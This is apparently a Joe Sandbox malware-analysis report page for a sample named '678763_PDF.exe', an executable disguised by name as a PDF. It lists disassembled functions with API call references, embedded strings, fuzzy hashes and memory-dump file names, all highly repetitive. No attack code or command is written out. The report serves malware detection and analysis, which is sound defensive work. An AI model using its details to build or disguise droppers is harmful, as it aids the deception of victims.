Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Function 00406DC6 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05

Function 0040759D Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

N, xrefs: 004051D8
M, xrefs: 004050F7
, xrefs: 00405511

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
GetDlgItem.USER32(?,000003E8), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831
: Completed, xrefs: 00404872

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
wsprintfA.USER32 ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Function 00406805 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857
C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
"C:\Users\user\Desktop\678763_PDF.exe", xrefs: 00406849

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\678763_PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2613972342
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040455A
GetSysColor.USER32(00000000), ref: 00404598
SetTextColor.GDI32(?,00000000), ref: 004045A4
SetBkMode.GDI32(?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(000ADBE7,00000064,000ADBEB), ref: 00402FE1
wsprintfW.USER32 ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

